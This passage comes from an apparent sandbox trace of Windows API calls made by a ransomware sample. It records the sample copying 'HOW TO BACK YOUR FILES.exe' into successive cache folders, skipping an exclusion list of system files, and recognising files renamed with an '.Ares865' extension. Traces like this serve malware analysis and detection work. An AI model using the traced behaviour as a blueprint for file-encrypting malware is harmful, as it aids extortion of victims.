(normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.632] GetLastError () returned 0x0 [0065.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.632] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.632] CloseHandle (hObject=0x12c) returned 1 [0065.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.633] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.633] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.633] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.633] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.633] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.633] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.633] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.633] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.633] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.633] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.633] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.633] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.633] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.633] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0065.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0065.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.633] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned 82 [0065.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0065.633] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.633] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.634] GetLastError () returned 0x0 [0065.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.634] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.634] CloseHandle (hObject=0x12c) returned 1 [0065.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.634] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.634] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.635] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.635] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.635] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.635] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.635] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.635] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.635] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.635] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.635] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.635] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.635] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0065.635] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0065.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.635] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned 90 [0065.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.636] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.636] GetLastError () returned 0x0 [0065.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.636] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.636] CloseHandle (hObject=0x12c) returned 1 [0065.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.636] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.636] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.636] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.636] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.636] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x55612c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0065.636] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0065.637] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0065.637] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.637] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\*") returned 92 [0065.637] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0065.637] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0065.637] lstrlenW (lpString="Ares865") returned 7 [0065.637] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.637] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4bc500, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.637] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.637] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat.Ares865", cAlternateFileName="INDEXD~1.ARE")) returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="aoldtz.exe") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2=".") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="..") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="windows") returned -1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="bootmgr") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="temp") returned -1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="pagefile.sys") returned -1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="boot") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="ids.txt") returned 1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="ntuser.dat") returned -1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="perflogs") returned -1 [0065.637] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="MSBuild") returned -1 [0065.637] lstrlenW (lpString="index.dat.Ares865") returned 17 [0065.637] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865") returned 110 [0065.638] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="index.dat.Ares865" | out: lpString1="index.dat.Ares865") returned="index.dat.Ares865" [0065.638] lstrlenW (lpString="index.dat.Ares865") returned 17 [0065.638] lstrlenW (lpString="Ares865") returned 7 [0065.638] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0065.638] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2=".") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="..") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="windows") returned -1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="bootmgr") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="temp") returned -1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="pagefile.sys") returned -1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="boot") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ids.txt") returned 1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ntuser.dat") returned -1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="perflogs") returned -1 [0065.638] lstrcmpiW (lpString1="MM5O9XQS", lpString2="MSBuild") returned -1 [0065.638] lstrlenW (lpString="MM5O9XQS") returned 8 [0065.638] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 108 [0065.638] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0065.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0065.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2d36d8 [0065.638] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0065.638] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2=".") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="..") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="windows") returned -1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="bootmgr") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="temp") returned -1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="pagefile.sys") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="boot") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ids.txt") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ntuser.dat") returned 1 [0065.638] lstrcmpiW (lpString1="PMMR5K9K", lpString2="perflogs") returned 1 [0065.639] lstrcmpiW (lpString1="PMMR5K9K", lpString2="MSBuild") returned 1 [0065.639] lstrlenW (lpString="PMMR5K9K") returned 8 [0065.639] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 99 [0065.639] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0065.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0065.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2d5ee0 [0065.639] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0065.639] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2=".") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="..") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="windows") returned -1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="bootmgr") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="temp") returned -1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="pagefile.sys") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="boot") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ids.txt") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ntuser.dat") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="perflogs") returned 1 [0065.639] lstrcmpiW (lpString1="RIJUQL1C", lpString2="MSBuild") returned 1 [0065.639] lstrlenW (lpString="RIJUQL1C") returned 8 [0065.639] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 99 [0065.639] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0065.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0065.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2d5fb0 [0065.639] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0065.639] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 